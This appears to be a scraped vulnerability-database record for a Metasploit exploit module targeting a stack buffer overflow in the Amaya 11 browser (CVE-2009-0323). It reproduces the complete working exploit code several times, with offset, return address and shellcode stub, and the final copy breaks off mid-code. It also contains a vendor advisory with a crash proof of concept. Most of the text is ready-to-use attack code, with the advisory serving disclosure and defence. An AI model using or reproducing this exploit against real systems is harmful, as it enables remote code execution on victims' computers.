ID MSF:EXPLOIT/WINDOWS/BROWSER/AMAYA_BDO Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the "bdo" tag, an attacker may be able to execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => "Amaya Browser v11.0 'bdo' Tag Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in the Amaya v11 Browser.
By sending an overly long string to the "bdo"
tag, an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'dookie, original exploit by Rob Carter' ],
'References' =>
[
[ 'CVE', '2009-0323' ],
[ 'OSVDB', '55721' ],
[ 'BID', '33046' ],
[ 'BID', '33047' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 970,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll
],
'DisclosureDate' => 'Jan 28 2009',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Set the exploit buffer
sploit = "<bdo dir=\""
sploit += rand_text_alpha(6889)
sploit += "\x74\x06\x41\x41"
sploit += [target.ret].pack('V')
sploit += "\x68\x7f\x01\x01\x7f" # push 7F01017F
sploit += "\x58" # pop EAX
sploit += "\x2d\x18\x69\x45\x7d" # sub EAX, 7A7A0857
sploit += "\x50" # push EAX
sploit += "\xc3" # RETN
sploit += make_nops(100)
sploit += payload.encoded
sploit += make_nops(970 - payload.encoded.length)
sploit += "\">pwned!</bdo>"
print_status("Sending #{self.name}")
# Transmit the response to the client
send_response_html(cli, sploit)
# Handle the payload
handler(cli)
end
end
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/AMAYA_BDO", "type": "metasploit", "bulletinFamily": "exploit", "title": "Amaya Browser v11.0 'bdo' Tag Overflow", "description": "This module exploits a stack buffer overflow in the Amaya v11 Browser. By sending an overly long string to the \"bdo\" tag, an attacker may be able to execute arbitrary code.\n", "published": "2009-10-10T21:51:25", "modified": "2017-07-24T13:26:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0323"], "cvelist": ["CVE-2009-0323"], "lastseen": "2020-08-14T20:34:05", "viewCount": 46, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2020-08-14T20:34:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0323"]}, {"type": "exploitdb", "idList": ["EDB-ID:7902", "EDB-ID:16548"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83102"]}, {"type": "freebsd", "idList": ["A89B76A7-F6BD-11DD-94D9-0030843D3802"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_A89B76A7F6BD11DD94D90030843D3802.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063357", "OPENVAS:63357"]}], "modified": "2020-08-14T20:34:05", "rev": 2}, "vulnersScore": 8.1}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/amaya_bdo.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Amaya Browser v11.0 'bdo' Tag Overflow\",\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Amaya v11 Browser.\n By sending an overly long string to the \"bdo\"\n tag, an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'dookie, original exploit by Rob Carter' ],\n 'References' =>\n [\n [ 'CVE', '2009-0323' ],\n [ 'OSVDB', '55721' ],\n [ 'BID', '33046' ],\n [ 'BID', '33047' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 970,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll\n ],\n 'DisclosureDate' => 'Jan 28 2009',\n 'DefaultTarget' => 0))\n end\n\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Set the exploit buffer\n sploit = \"<bdo dir=\\\"\"\n sploit += rand_text_alpha(6889)\n sploit += \"\\x74\\x06\\x41\\x41\"\n sploit += [target.ret].pack('V')\n sploit += \"\\x68\\x7f\\x01\\x01\\x7f\" # push 7F01017F\n sploit += \"\\x58\"\t\t # pop EAX\n sploit += \"\\x2d\\x18\\x69\\x45\\x7d\" # sub EAX, 7A7A0857\n sploit += \"\\x50\"\t\t # push EAX\n sploit += \"\\xc3\"\t\t # RETN\n sploit += make_nops(100)\n sploit += payload.encoded\n sploit += make_nops(970 - payload.encoded.length)\n sploit += \"\\\">pwned!</bdo>\"\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, sploit)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2021-02-02T05:39:58", "description": "Multiple stack-based buffer overflows in W3C Amaya Web Browser 10.0 and 11.0 allow remote attackers to execute arbitrary code via (1) a long type parameter in an input tag, which is not properly handled by the EndOfXmlAttributeValue function; (2) an \"HTML GI\" in a start tag, which is not properly handled by the ProcessStartGI function; and unspecified vectors in (3) html2thot.c and (4) xml2thot.c, related to the msgBuffer variable. NOTE: these are different vectors than CVE-2008-6005.", "edition": 6, "cvss3": {}, "published": "2009-01-28T20:30:00", "title": "CVE-2009-0323", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0323"], "modified": "2018-10-11T21:01:00", "cpe": ["cpe:/a:w3:amaya:8.1", "cpe:/a:w3:amaya:1.3b", "cpe:/a:w3:amaya:8.5", "cpe:/a:w3:amaya:2.3", "cpe:/a:w3:amaya:8.8.3", "cpe:/a:w3:amaya:1.2", "cpe:/a:w3:amaya:8.8.5", "cpe:/a:w3:amaya:1.1", "cpe:/a:w3:amaya:1.1c", "cpe:/a:w3:amaya:6.4", "cpe:/a:w3:amaya:2.2", "cpe:/a:w3:amaya:9.1", "cpe:/a:w3:amaya:2.4", "cpe:/a:w3:amaya:4.3.2", "cpe:/a:w3:amaya:8.4", "cpe:/a:w3:amaya:8.1a", "cpe:/a:w3:amaya:8.8.1", "cpe:/a:w3:amaya:1.0a", "cpe:/a:w3:amaya:9.2.1", "cpe:/a:w3:amaya:3.2", "cpe:/a:w3:amaya:1.4a", "cpe:/a:w3:amaya:8.7.1", "cpe:/a:w3:amaya:11.0", "cpe:/a:w3:amaya:9.52", "cpe:/a:w3:amaya:3.0", "cpe:/a:w3:amaya:10.0", "cpe:/a:w3:amaya:8.52", "cpe:/a:w3:amaya:8.1b", "cpe:/a:w3:amaya:6.0", "cpe:/a:w3:amaya:4.3", "cpe:/a:w3:amaya:6.2", "cpe:/a:w3:amaya:8.7", "cpe:/a:w3:amaya:6.3", "cpe:/a:w3:amaya:9.0", "cpe:/a:w3:amaya:9.53", "cpe:/a:w3:amaya:8.0", "cpe:/a:w3:amaya:5.2", "cpe:/a:w3:amaya:4.0", "cpe:/a:w3:amaya:8.7.2", "cpe:/a:w3:amaya:7.1", "cpe:/a:w3:amaya:8.3", "cpe:/a:w3:amaya:4.3.1", "cpe:/a:w3:amaya:1.3a", "cpe:/a:w3:amaya:7.0", "cpe:/a:w3:amaya:9.4", "cpe:/a:w3:amaya:4.2", "cpe:/a:w3:amaya:9.5", "cpe:/a:w3:amaya:5.0", "cpe:/a:w3:amaya:7.2", "cpe:/a:w3:amaya:4.2.1", "cpe:/a:w3:amaya:1.0", "cpe:/a:w3:amaya:9.3", "cpe:/a:w3:amaya:5.1", "cpe:/a:w3:amaya:3.2.1", "cpe:/a:w3:amaya:9.54", "cpe:/a:w3:amaya:8.8.4", "cpe:/a:w3:amaya:1.4", "cpe:/a:w3:amaya:3.1", "cpe:/a:w3:amaya:8.6", "cpe:/a:w3:amaya:0.95b", "cpe:/a:w3:amaya:1.3", "cpe:/a:w3:amaya:2.1", "cpe:/a:w3:amaya:9.55", "cpe:/a:w3:amaya:1.2a", "cpe:/a:w3:amaya:0.9", "cpe:/a:w3:amaya:6.1", "cpe:/a:w3:amaya:8.2", "cpe:/a:w3:amaya:5.3", "cpe:/a:w3:amaya:4.1", "cpe:/a:w3:amaya:2.0", "cpe:/a:w3:amaya:1.1a"], "id": "CVE-2009-0323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0323", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:w3:amaya:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.0a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.5:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.54:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.55:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.53:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.3a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.1c:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.7:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.1b:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:0.95b:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.2a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:6.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.1a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.4a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.52:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.1a:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.3b:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:w3:amaya:8.2:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:49", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Amaya Browser v11.0 bdo tag overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0323"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83102", "href": "https://packetstormsecurity.com/files/83102/Amaya-Browser-v11.0-bdo-tag-overflow.html", "sourceData": "`## \n# $Id: amaya_bdo.rb \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Amaya Browser v11.0 bdo tag overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in the Amaya v11 Browser. \nBy sending an overly long string to the \"bdo\" \ntag, an attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'dookie, original exploit by Rob Carter' ], \n'Version' => '$Revision: 6812 $', \n'References' => \n[ \n[ 'CVE', '2009-0323' ], \n[ 'OSVDB', '55721' ], \n[ 'BID', '33046, 33047' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 970, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll \n], \n'DisclosureDate' => 'Jan 28 2009', \n'DefaultTarget' => 0)) \nend \n \n \ndef on_request_uri(cli, request) \n# Re-generate the payload \nreturn if ((p = regenerate_payload(cli)) == nil) \n \n# Set the exploit buffer \nsploit = \"<bdo dir=\\\"\" \nsploit += \"\\x41\" * 6889 \nsploit += \"\\x74\\x06\\x41\\x41\" \nsploit += [target.ret].pack('V') \nsploit += \"\\x68\\x7f\\x01\\x01\\x7f\" # push 7F01017F \nsploit += \"\\x58\" # pop EAX \nsploit += \"\\x2d\\x18\\x69\\x45\\x7d\" # sub EAX, 7A7A0857 \nsploit += \"\\x50\" # push EAX \nsploit += \"\\xc3\" # RETN \nsploit += make_nops(100) \nsploit += payload.encoded \nsploit += make_nops(970 - payload.encoded.length) \nsploit += \"\\\">pwned!</bdo>\" \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, sploit) \n \n# Handle the payload \nhandler(cli) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83102/amaya_bdo.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T04:18:38", "description": "Amaya Web Editor XML and HTML parser Vulnerabilities. CVE-2009-0323. Dos exploit for windows platform", "published": "2009-01-28T00:00:00", "type": "exploitdb", "title": "Amaya Web Editor XML and HTML parser Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0323"], "modified": "2009-01-28T00:00:00", "id": "EDB-ID:7902", "href": "https://www.exploit-db.com/exploits/7902/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nAmaya web editor XML and HTML parser vulnerabilities\n\n\n\n1. *Advisory Information*\n\nTitle: Amaya web editor XML and HTML parser vulnerabilities\nAdvisory ID: CORE-2008-1211\nAdvisory URL: http://www.coresecurity.com/content/amaya-buffer-overflows\nDate published: 2009-01-28\nDate of last update: 2009-01-26\nVendors contacted: INRIA\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 33046, 33047\nCVE Name: N/A\n\n\n3. *Vulnerability Description*\n\nAmaya is the W3C's Web editor/browser, a tool used to create and update\ndocuments directly on the Web. Multiple stack buffer overflow\nvulnerabilities have been discovered in Amaya, which can be exploited by\nunauthorized people using crafted web pages to compromise a user's system.\n\n\n4. *Vulnerable packages*\n\n . Amaya 11.0 and previous versions.\n\n\n5. *Non-vulnerable packages*\n\n . Amaya 11.1.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nPatched versions should be downloadable from Amaya's web site [1].\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Dan Crowley and\nAlfredo Ortega from Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\nMultiple stack buffer overflow vulnerabilities have been discovered in\nAmaya web editor/browser [1], which can be exploited by unauthorized\npeople using crafted web pages to compromise a user's system.\n\nA boundary error when processing 'input' HTML tags can be exploited to\ncause a stack-based buffer overflow via an overly long 'type' parameter\n(Bugtraq ID 33046). Code analysis of the Amaya XHTML parser reveals\nmultiple unchecked buffers declared on the stack, one of which is used\nin the function 'EndOfXmlAttributeValue()':\n\n/-----------\n\nXml2thot.c\n\n3247\tstatic void EndOfXmlAttributeValue (char *attrValue)\n3248\n3249\t{\n3250\t AttributeType attrType;\n3251\t int attrKind, val;\n3252\t unsigned char msgBuffer[MaxMsgLength];\n3253\n\n.\n.\n.\n3265\t if (val <= 0)\n3266\t {\n3267\t sprintf ((char *)msgBuffer,\n3268\t \"Unknown attribute value \\\"%s\\\"\", (char\n*)attrValue);\n3269\t XmlParseError (errorParsing, (unsigned char *)msgBuffer,\n0);\n3270 }\n\n\n- -----------/\n\n\n\nWe can see here that the 'sprintf' function at line 3267 will write on\nthe buffer 'msgBuffer' if there is an error, but it will never check\nthat the error message fits the length of that buffer, so if the\nattribute exceeds a length of about 170 characters, a buffer overflow\nwill ensue.\n\nThe following page consisting of a single HTML tag is enough to trigger\nthis vulnerability. This code will control the instruction pointer,\ncausing the Amaya web editor program to jump to the address '0x41414141':\n\n/-----------\n\n<input\ntype=\"aBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBCDaBAAAA\">\n\n- -----------/\n\n\n\nOther stack-based buffer overflows were discovered.\n\nWhen reading the HTML in function 'EndOfStartGI()', the length of the\nvariable 'theGI' is correctly limited to the buffer length.\n\n/-----------\n\nhtml2toth.c:\n\n2506\n/*----------------------------------------------------------------------\n2507\t EndOfStartGI An HTML GI has been read in a start tag.\n2508\n- ----------------------------------------------------------------------*/\n2509\tstatic void EndOfStartGI (char c)\n2510\t{\n2511\t char theGI[MaxMsgLength];\n.\n.\n.\n2538\t strncpy ((char *)theGI, (char *)inputBuffer, MaxMsgLength - 1);\n2539\t theGI[MaxMsgLength - 1] = EOS\n.\n.\n.\n2596\t ProcessStartGI (theGI);\n\n- -----------/\n\n But when calling 'ProcessStartGI()', an error message will add 50 extra\ncharacters to this variable (line 2440), and a stack-based buffer\noverflow will ensue (Bugtraq ID 33047):\n\n/-----------\n\n2321\n/*----------------------------------------------------------------------\n2322\t ProcessStartGI An HTML GI has been read in a start tag.\n2323\t Create the corresponding Thot thing (element, attribute,\n2324\t or character), according to the mapping table.\n2325\n- ----------------------------------------------------------------------*/\n2326\tstatic void ProcessStartGI (const char* GIname)\n2327\t{\n2331\t char msgBuffer[MaxMsgLength];\n\n.\n.\n.\n\n2436\t if (error)\n2437\t /* element not allowed in the current structural context */\n2438\t {\n2439\t /* send an error message */\n2440\t sprintf (msgBuffer,\n2441\t \"Tag <%s> is not allowed here (removed when\nsaving)\",\n2442\t GIname);\n2443\t HTMLParseError (HTMLcontext.doc, msgBuffer, 0);\n\n\n- -----------/\n\n This is not an exhaustive enumeration of the stack-based buffer\noverflows that can be found in Amaya. Remarkably, in the unpatched\nversion, files 'html2thot.c' and 'xml2thot.c' contain many general\npurpose buffers defined as\n\n/-----------\n\nchar msgBuffer[MaxMsgLength]\n- -----------/\n\n and the length of buffers is generally not checked in the functions\nusing them (i.e. 'strcpy', 'sprintf', etcetera).\n\n\n9. *Report Timeline*\n\n. 2008-12-18: Core notifies the vendor of the vulnerability.\n. 2008-12-19: Vendor requests information about versions tested.\n. 2008-12-19: Core notifies the vendor that the vulnerability was tested\non Amaya 11.0 and 10.0 (Windows XP).\n. 2008-12-29: Core offers to send the advisory draft to the vendor and\noffers to negotiate the publication date.\n. 2009-01-08: Core sends the advisory draft to the vendor.\n. 2009-01-09: Vendor informs that the bugs were fixed in the CVS version\nand will be included in version 11.1 by the end of January.\n. 2009-01-12: Core requests a more precise date.\n. 2009-01-14: Vendor suggest to publish the advisory on January 28th at\nthe same time of release of Amaya 11.1.\n. 2009-01-14: Core confirms the vendor that advisory CORE-2008-1211 will\nbe published on January 28th.\n. 2009-01-28: Core publishes advisory CORE-2008-1211.\n\n\n10. *References*\n\n[1] Amaya Homepage http://www.w3.org/Amaya\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFJgKLpyNibggitWa0RAmNOAKCT1Mxhe8VysinqBnwAtbuuhAaedgCeOWL6\nDWuJPZIBvcK5lINLAJ2ylR8=\n=X9Dw\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-01-28]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/7902/"}, {"lastseen": "2016-02-02T00:06:50", "description": "Amaya Browser v11.0 bdo tag overflow. CVE-2009-0323. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Amaya Browser 11.0 - bdo tag Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0323"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16548", "href": "https://www.exploit-db.com/exploits/16548/", "sourceData": "##\r\n# $Id: amaya_bdo.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Amaya Browser v11.0 bdo tag overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the Amaya v11 Browser.\r\n\t\t\t\t\tBy sending an overly long string to the \"bdo\"\r\n\t\t\t\t\ttag, an attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'dookie, original exploit by Rob Carter' ],\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0323' ],\r\n\t\t\t\t\t[ 'OSVDB', '55721' ],\r\n\t\t\t\t\t[ 'BID', '33046, 33047' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 970,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Amaya Browser v11', { 'Offset' => 6889, 'Ret' => 0x02101034 } ], # wxmsw28u_core_vc_custom.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 28 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Set the exploit buffer\r\n\t\tsploit = \"<bdo dir=\\\"\"\r\n\t\tsploit += \"\\x41\" * 6889\r\n\t\tsploit += \"\\x74\\x06\\x41\\x41\"\r\n\t\tsploit += [target.ret].pack('V')\r\n\t\tsploit += \"\\x68\\x7f\\x01\\x01\\x7f\" # push 7F01017F\r\n\t\tsploit += \"\\x58\"\t\t # pop EAX\r\n\t\tsploit += 